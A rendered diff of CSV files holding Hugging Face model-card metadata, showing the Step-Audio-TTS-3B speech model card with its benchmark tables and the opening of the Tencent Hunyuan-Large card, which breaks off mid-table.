|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
stepfun-ai/Step-Audio-TTS-3B,"---
|
| 3 |
+
license: apache-2.0
|
| 4 |
+
pipeline_tag: text-to-speech
|
| 5 |
+
---
|
| 6 |
+
# Step-Audio-TTS-3B
|
| 7 |
+
|
| 8 |
+
Step-Audio-TTS-3B represents the industry's first Text-to-Speech (TTS) model trained on a large-scale synthetic dataset utilizing the LLM-Chat paradigm. It has achieved SOTA Character Error Rate (CER) results on the SEED TTS Eval benchmark. The model supports multiple languages, a variety of emotional expressions, and diverse voice style controls. Notably, Step-Audio-TTS-3B is also the first TTS model in the industry capable of generating RAP and Humming, marking a significant advancement in the field of speech synthesis.
|
| 9 |
+
|
| 10 |
+
This repository provides the model weights for StepAudio-TTS-3B, which is a dual-codebook trained LLM (Large Language Model) for text-to-speech synthesis. Additionally, it includes a vocoder trained using the dual-codebook approach, as well as a specialized vocoder specifically optimized for humming generation. These resources collectively enable high-quality speech synthesis and humming capabilities, leveraging the advanced dual-codebook training methodology.
|
| 11 |
+
|
| 12 |
+
## Performance comparison of content consistency (CER/WER) between GLM-4-Voice and MinMo.
|
| 13 |
+
|
| 14 |
+
<table>
|
| 15 |
+
<thead>
|
| 16 |
+
<tr>
|
| 17 |
+
<th rowspan=""2"">Model</th>
|
| 18 |
+
<th style=""text-align:center"" colspan=""1"">test-zh</th>
|
| 19 |
+
<th style=""text-align:center"" colspan=""1"">test-en</th>
|
| 20 |
+
</tr>
|
| 21 |
+
<tr>
|
| 22 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 23 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 24 |
+
</tr>
|
| 25 |
+
</thead>
|
| 26 |
+
<tbody>
|
| 27 |
+
<tr>
|
| 28 |
+
<td>GLM-4-Voice</td>
|
| 29 |
+
<td style=""text-align:center"">2.19</td>
|
| 30 |
+
<td style=""text-align:center"">2.91</td>
|
| 31 |
+
</tr>
|
| 32 |
+
<tr>
|
| 33 |
+
<td>MinMo</td>
|
| 34 |
+
<td style=""text-align:center"">2.48</td>
|
| 35 |
+
<td style=""text-align:center"">2.90</td>
|
| 36 |
+
</tr>
|
| 37 |
+
<tr>
|
| 38 |
+
<td><strong>Step-Audio</strong></td>
|
| 39 |
+
<td style=""text-align:center""><strong>1.53</strong></td>
|
| 40 |
+
<td style=""text-align:center""><strong>2.71</strong></td>
|
| 41 |
+
</tr>
|
| 42 |
+
</tbody>
|
| 43 |
+
</table>
|
| 44 |
+
|
| 45 |
+
## Results of TTS Models on SEED Test Sets.
|
| 46 |
+
* StepAudio-TTS-3B-Single denotes dual-codebook backbone with single-codebook vocoder*
|
| 47 |
+
|
| 48 |
+
<table>
|
| 49 |
+
<thead>
|
| 50 |
+
<tr>
|
| 51 |
+
<th rowspan=""2"">Model</th>
|
| 52 |
+
<th style=""text-align:center"" colspan=""2"">test-zh</th>
|
| 53 |
+
<th style=""text-align:center"" colspan=""2"">test-en</th>
|
| 54 |
+
</tr>
|
| 55 |
+
<tr>
|
| 56 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 57 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 58 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 59 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 60 |
+
</tr>
|
| 61 |
+
</thead>
|
| 62 |
+
<tbody>
|
| 63 |
+
<tr>
|
| 64 |
+
<td>FireRedTTS</td>
|
| 65 |
+
<td style=""text-align:center"">1.51</td>
|
| 66 |
+
<td style=""text-align:center"">0.630</td>
|
| 67 |
+
<td style=""text-align:center"">3.82</td>
|
| 68 |
+
<td style=""text-align:center"">0.460</td>
|
| 69 |
+
</tr>
|
| 70 |
+
<tr>
|
| 71 |
+
<td>MaskGCT</td>
|
| 72 |
+
<td style=""text-align:center"">2.27</td>
|
| 73 |
+
<td style=""text-align:center"">0.774</td>
|
| 74 |
+
<td style=""text-align:center"">2.62</td>
|
| 75 |
+
<td style=""text-align:center"">0.774</td>
|
| 76 |
+
</tr>
|
| 77 |
+
<tr>
|
| 78 |
+
<td>CosyVoice</td>
|
| 79 |
+
<td style=""text-align:center"">3.63</td>
|
| 80 |
+
<td style=""text-align:center"">0.775</td>
|
| 81 |
+
<td style=""text-align:center"">4.29</td>
|
| 82 |
+
<td style=""text-align:center"">0.699</td>
|
| 83 |
+
</tr>
|
| 84 |
+
<tr>
|
| 85 |
+
<td>CosyVoice 2</td>
|
| 86 |
+
<td style=""text-align:center"">1.45</td>
|
| 87 |
+
<td style=""text-align:center"">0.806</td>
|
| 88 |
+
<td style=""text-align:center"">2.57</td>
|
| 89 |
+
<td style=""text-align:center"">0.736</td>
|
| 90 |
+
</tr>
|
| 91 |
+
<tr>
|
| 92 |
+
<td>CosyVoice 2-S</td>
|
| 93 |
+
<td style=""text-align:center"">1.45</td>
|
| 94 |
+
<td style=""text-align:center"">0.812</td>
|
| 95 |
+
<td style=""text-align:center"">2.38</td>
|
| 96 |
+
<td style=""text-align:center"">0.743</td>
|
| 97 |
+
</tr>
|
| 98 |
+
<tr>
|
| 99 |
+
<td><strong>Step-Audio-TTS-3B-Single</strong></td>
|
| 100 |
+
<td style=""text-align:center"">1.37</td>
|
| 101 |
+
<td style=""text-align:center"">0.802</td>
|
| 102 |
+
<td style=""text-align:center"">2.52</td>
|
| 103 |
+
<td style=""text-align:center"">0.704</td>
|
| 104 |
+
</tr>
|
| 105 |
+
<tr>
|
| 106 |
+
<td><strong>Step-Audio-TTS-3B</strong></td>
|
| 107 |
+
<td style=""text-align:center""><strong>1.31</strong></td>
|
| 108 |
+
<td style=""text-align:center"">0.733</td>
|
| 109 |
+
<td style=""text-align:center""><strong>2.31</strong></td>
|
| 110 |
+
<td style=""text-align:center"">0.660</td>
|
| 111 |
+
</tr>
|
| 112 |
+
<tr>
|
| 113 |
+
<td><strong>Step-Audio-TTS</strong></td>
|
| 114 |
+
<td style=""text-align:center""><strong>1.17</strong></td>
|
| 115 |
+
<td style=""text-align:center"">0.73</td>
|
| 116 |
+
<td style=""text-align:center""><strong>2.0</strong></td>
|
| 117 |
+
<td style=""text-align:center"">0.660</td>
|
| 118 |
+
</tr>
|
| 119 |
+
</tbody>
|
| 120 |
+
</table>
|
| 121 |
+
|
| 122 |
+
## Performance comparison of Dual-codebook Resynthesis with Cosyvoice.
|
| 123 |
+
|
| 124 |
+
<table>
|
| 125 |
+
<thead>
|
| 126 |
+
<tr>
|
| 127 |
+
<th style=""text-align:center"" rowspan=""2"">Token</th>
|
| 128 |
+
<th style=""text-align:center"" colspan=""2"">test-zh</th>
|
| 129 |
+
<th style=""text-align:center"" colspan=""2"">test-en</th>
|
| 130 |
+
</tr>
|
| 131 |
+
<tr>
|
| 132 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 133 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 134 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 135 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 136 |
+
</tr>
|
| 137 |
+
</thead>
|
| 138 |
+
<tbody>
|
| 139 |
+
<tr>
|
| 140 |
+
<td style=""text-align:center"">Groundtruth</td>
|
| 141 |
+
<td style=""text-align:center"">0.972</td>
|
| 142 |
+
<td style=""text-align:center"">-</td>
|
| 143 |
+
<td style=""text-align:center"">2.156</td>
|
| 144 |
+
<td style=""text-align:center"">-</td>
|
| 145 |
+
</tr>
|
| 146 |
+
<tr>
|
| 147 |
+
<td style=""text-align:center"">CosyVoice</td>
|
| 148 |
+
<td style=""text-align:center"">2.857</td>
|
| 149 |
+
<td style=""text-align:center""><strong>0.849</strong></td>
|
| 150 |
+
<td style=""text-align:center"">4.519</td>
|
| 151 |
+
<td style=""text-align:center""><strong>0.807</strong></td>
|
| 152 |
+
</tr>
|
| 153 |
+
<tr>
|
| 154 |
+
<td style=""text-align:center"">Step-Audio-TTS-3B</td>
|
| 155 |
+
<td style=""text-align:center""><strong>2.192</strong></td>
|
| 156 |
+
<td style=""text-align:center"">0.784</td>
|
| 157 |
+
<td style=""text-align:center""><strong>3.585</strong></td>
|
| 158 |
+
<td style=""text-align:center"">0.742</td>
|
| 159 |
+
</tr>
|
| 160 |
+
</tbody>
|
| 161 |
+
</table>
|
| 162 |
+
|
| 163 |
+
# More information
|
| 164 |
+
For more information, please refer to our repository: [Step-Audio](https://github.com/stepfun-ai/Step-Audio).","{""id"": ""stepfun-ai/Step-Audio-TTS-3B"", ""author"": ""stepfun-ai"", ""sha"": ""9ddb7cb28b97bbfceb429f1a2567b30256b7137c"", ""last_modified"": ""2025-02-17 15:50:57+00:00"", ""created_at"": ""2025-02-13 14:49:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 277, ""downloads_all_time"": null, ""likes"": 182, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""onnx"", ""safetensors"", ""step1"", ""text-to-speech"", ""custom_code"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""text-to-speech"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: apache-2.0\npipeline_tag: text-to-speech"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Step1ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_step1.Step1Config"", ""AutoModelForCausalLM"": ""modeling_step1.Step1ForCausalLM""}, ""model_type"": ""step1"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/VERSION_Vq0206Vocoder_Sing_0106', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/campplus.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/cosyvoice.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/flow.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/hift.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/speech_tokenizer_v1.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/VERSION_Vq0206Vocoder_1202', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/campplus.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/cosyvoice.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/flow.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/hift.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/speech_tokenizer_v1.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_step1.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.2-cu121.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.3-cu121.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.5-cu124.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_step1.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""mrfakename/Step-Audio-TTS-3B"", ""zhiweiliu/tts_app""], ""safetensors"": {""parameters"": {""BF16"": 3529706496}, ""total"": 3529706496}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-17 15:50:57+00:00"", ""cardData"": ""license: apache-2.0\npipeline_tag: text-to-speech"", ""transformersInfo"": null, ""_id"": ""67ae0676f77ed76ae189c1a7"", ""modelId"": ""stepfun-ai/Step-Audio-TTS-3B"", ""usedStorage"": 8631522644}",0,,0,,0,,0,,0,"huggingface/InferenceSupport/discussions/new?title=stepfun-ai/Step-Audio-TTS-3B&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bstepfun-ai%2FStep-Audio-TTS-3B%5D(%2Fstepfun-ai%2FStep-Audio-TTS-3B)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mrfakename/Step-Audio-TTS-3B, zhiweiliu/tts_app",3
|
Tencent-Hunyuan-Large_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
|
@@ -0,0 +1,387 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
tencent/Tencent-Hunyuan-Large,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
pipeline_tag: text-generation
|
| 6 |
+
library_name: transformers
|
| 7 |
+
|
| 8 |
+
license: other
|
| 9 |
+
license_name: tencent-license
|
| 10 |
+
license_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt
|
| 11 |
+
---
|
| 12 |
+
|
| 13 |
+
<p align=""center"">
|
| 14 |
+
<img src=""https://dscache.tencent-cloud.cn/upload/uploader/hunyuan-64b418fd052c033b228e04bc77bbc4b54fd7f5bc.png"" width=""400""/> <br>
|
| 15 |
+
</p><p></p>
|
| 16 |
+
|
| 17 |
+
<p align=""center"">
|
| 18 |
+
 <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large""><b>GITHUB</b></a>   |   🖥️  <a href=""https://llm.hunyuan.tencent.com/"" style=""color: blue;""><b>official website</b></a>  |  🕖   <a href=""https://cloud.tencent.com/product/hunyuan"" ><b>HunyuanAPI</b></a>|  🐳   <a href=""https://gitee.com/Tencent/Tencent-Hunyuan-Large"" ><b>Gitee</b></a>
|
| 19 |
+
</p><p align=""center"">
|
| 20 |
+
<a href=""https://arxiv.org/abs/2411.02265"" style=""color: blue;""><b>Technical Report</b></a>  |   <a href=""https://huggingface.co/spaces/tencent/Hunyuan-Large""><b>Demo</b></a>   |   <a href=""https://cloud.tencent.com/document/product/851/112032"" style=""color: blue;""><b>Tencent Cloud TI</b></a>   </p>
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
<p>
|
| 25 |
+
<table align=""center"">
|
| 26 |
+
<tbody>
|
| 27 |
+
<tr align=""center"">
|
| 28 |
+
<td align=""center"" colspan=""3""><strong>Download Models</strong></td>
|
| 29 |
+
</tr>
|
| 30 |
+
<tr align=""center"">
|
| 31 |
+
<td align=""center"" style=""width: 200px;"" ><strong>Models</strong></td>
|
| 32 |
+
<td align=""center"" style=""width: 400px;""><strong>Huggingface Download URL</strong></td>
|
| 33 |
+
<td align=""center"" style=""width: 400px;""><strong>Tencent Cloud Download URL</strong></td>
|
| 34 |
+
</tr>
|
| 35 |
+
<tr align=""center"">
|
| 36 |
+
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Instruct-FP8</td>
|
| 37 |
+
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Instruct-FP8"" ;"">Hunyuan-A52B-Instruct-FP8</a></td>
|
| 38 |
+
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Instruct-128k-fp8-20241116.zip"" ;"">Hunyuan-A52B-Instruct-FP8</a></td>
|
| 39 |
+
</tr>
|
| 40 |
+
<tr align=""center"">
|
| 41 |
+
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Instruct</td>
|
| 42 |
+
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Instruct"" ;"">Hunyuan-A52B-Instruct</a></td>
|
| 43 |
+
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Instruct-128k-20241116.zip"" ;"">Hunyuan-A52B-Instruct</a></td>
|
| 44 |
+
</tr>
|
| 45 |
+
<tr align=""center"">
|
| 46 |
+
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Pretrain</td>
|
| 47 |
+
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Pretrain"" ;"">Hunyuan-A52B-Pretrain</a></td>
|
| 48 |
+
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Pretrain-256k.zip"" ;"">Hunyuan-A52B-Pretrain</a></td>
|
| 49 |
+
</tr>
|
| 50 |
+
</tbody>
|
| 51 |
+
</table>
|
| 52 |
+
</p>
|
| 53 |
+
|
| 54 |
+
|
| 55 |
+
### Model Introduction
|
| 56 |
+
|
| 57 |
+
With the rapid development of artificial intelligence technology, large language models (LLMs) have made significant progress in fields such as natural language processing, computer vision, and scientific tasks. However, as the scale of these models increases, optimizing resource consumption while maintaining high performance has become a key challenge. To address this challenge, we have explored Mixture of Experts (MoE) models. The currently unveiled Hunyuan-Large (Hunyuan-MoE-A52B) model is the largest open-source Transformer-based MoE model in the industry, featuring a total of 389 billion parameters and 52 billion active parameters. This is currently the largest open-source Transformer-based MoE model in the industry, featuring a total of 389 billion parameters and 52 billion active parameters.
|
| 58 |
+
|
| 59 |
+
By open-sourcing the Hunyuan-Large model and revealing related technical details, we hope to inspire more researchers with innovative ideas and collectively advance the progress and application of AI technology. We welcome you to join our open-source community to explore and optimize future AI models together!
|
| 60 |
+
|
| 61 |
+
### Introduction to Model Technical Advantages
|
| 62 |
+
|
| 63 |
+
#### Model
|
| 64 |
+
- **High-Quality Synthetic Data**: By enhancing training with synthetic data, Hunyuan-Large can learn richer representations, handle long-context inputs, and generalize better to unseen data.
|
| 65 |
+
|
| 66 |
+
- **KV Cache Compression**: Utilizes Grouped Query Attention (GQA) and Cross-Layer Attention (CLA) strategies to significantly reduce memory usage and computational overhead of KV caches, improving inference throughput.
|
| 67 |
+
|
| 68 |
+
- **Expert-Specific Learning Rate Scaling**: Sets different learning rates for different experts to ensure each sub-model effectively learns from the data and contributes to overall performance.
|
| 69 |
+
|
| 70 |
+
- **Long-Context Processing Capability**: The pre-trained model supports text sequences up to 256K, and the Instruct model supports up to 128K, significantly enhancing the ability to handle long-context tasks.
|
| 71 |
+
|
| 72 |
+
- **Extensive Benchmarking**: Conducts extensive experiments across various languages and tasks to validate the practical effectiveness and safety of Hunyuan-Large.
|
| 73 |
+
|
| 74 |
+
|
| 75 |
+
|
| 76 |
+
|
| 77 |
+
## Benchmark Evaluation
|
| 78 |
+
|
| 79 |
+
**Hunyuan-Large pre-trained model** achieves the best overall performance compared to both Dense and MoE based
|
| 80 |
+
competitors having similar activated parameter sizes. For aggregated benchmarks such as MMLU, MMLU-Pro, and CMMLU,
|
| 81 |
+
Hunyuan-Large consistently achieves the best performance, confirming its comprehensive abilities on aggregated tasks.
|
| 82 |
+
Hunyuan-Large also shows superior performance in commonsense understanding and reasoning, and classical NLP tasks
|
| 83 |
+
such as QA and reading comprehension tasks (e.g., CommonsenseQA, PIQA and TriviaQA).
|
| 84 |
+
For the mathematics capability, Hunyuan-Large outperforms all baselines in math datasets of GSM8K and MATH,
|
| 85 |
+
and also gains the best results on CMATH in Chinese.We also observe that Hunyuan-Large achieves the overall
|
| 86 |
+
best performance in all Chinese tasks (e.g., CMMLU, C-Eval).
|
| 87 |
+
|
| 88 |
+
| Model | LLama3.1-405B | LLama3.1-70B | Mixtral-8x22B | DeepSeek-V2 | Hunyuan-Large |
|
| 89 |
+
|------------------|---------------|--------------|---------------|-------------|---------------|
|
| 90 |
+
| MMLU | 85.2 | 79.3 | 77.8 | 78.5 | **88.4** |
|
| 91 |
+
| MMLU-Pro | **61.6** | 53.8 | 49.5 | - | 60.2 |
|
| 92 |
+
| BBH | 85.9 | 81.6 | 78.9 | 78.9 | **86.3** |
|
| 93 |
+
| HellaSwag | - | - | **88.7** | 87.8 | 86.8 |
|
| 94 |
+
| CommonsenseQA | 85.8 | 84.1 | 82.4 | - | **92.9** |
|
| 95 |
+
| WinoGrande | 86.7 | 85.3 | 85.0 | 84.9 | **88.7** |
|
| 96 |
+
| PIQA | - | - | 83.6 | 83.7 | **88.3** |
|
| 97 |
+
| NaturalQuestions | - | - | 39.6 | 38.7 | **52.8** |
|
| 98 |
+
| DROP | 84.8 | 79.6 | 80.4 | 80.1 | **88.9** |
|
| 99 |
+
| ARC-C | **96.1** | 92.9 | 91.2 | 92.4 | 95.0 |
|
| 100 |
+
| TriviaQA | - | - | 82.1 | 79.9 | **89.2** |
|
| 101 |
+
| CMMLU | - | - | 60.0 | 84.0 | **90.2** |
|
| 102 |
+
| C-Eval | - | - | 59.6 | 81.7 | **91.9** |
|
| 103 |
+
| C3 | - | - | 71.4 | 77.4 | **82.3** |
|
| 104 |
+
| GSM8K | 89.0 | 83.7 | 83.7 | 79.2 | **92.8** |
|
| 105 |
+
| MATH | 53.8 | 41.4 | 42.5 | 43.6 | **69.8** |
|
| 106 |
+
| CMATH | - | - | 72.3 | 78.7 | **91.3** |
|
| 107 |
+
| HumanEval | 61.0 | 58.5 | 53.1 | 48.8 | **71.4** |
|
| 108 |
+
| MBPP | **73.4** | 68.6 | 64.2 | 66.6 | 72.6 |
|
| 109 |
+
|
| 110 |
+
**Hunyuan-Large-Instruct** achieves consistent improvements on most types of tasks compared to LLMs having similar
|
| 111 |
+
activated parameters, indicating the effectiveness of our post-training. Delving into the model performance
|
| 112 |
+
in different categories of benchmarks, we find that our instruct model achieves the best performance on MMLU and MATH dataset.
|
| 113 |
+
Notably, on the MMLU dataset, our model demonstrates a significant improvement, outperforming the LLama3.1-405B model by 2.6%.
|
| 114 |
+
This enhancement is not just marginal but indicative of the Hunyuan-Large-Instruct’s superior understanding and reasoning
|
| 115 |
+
capabilities across a wide array of language understanding tasks. The model’s prowess is further underscored in its performance
|
| 116 |
+
on the MATH dataset, where it surpasses the LLama3.1-405B by a notable margin of 3.6%.
|
| 117 |
+
Remarkably, this leap in accuracy is achieved with only 52 billion activated parameters, underscoring the efficiency of our model.
|
| 118 |
+
|
| 119 |
+
| Model | LLama3.1 405B Inst. | LLama3.1 70B Inst. | Mixtral 8x22B Inst. | DeepSeekV2.5 Chat | Hunyuan-Large Inst. |
|
| 120 |
+
|----------------------|---------------------|--------------------|---------------------|-------------------|---------------------|
|
| 121 |
+
| MMLU | 87.3 | 83.6 | 77.8 | 80.4 | **89.9** |
|
| 122 |
+
| CMMLU | - | - | 61.0 | - | **90.4** |
|
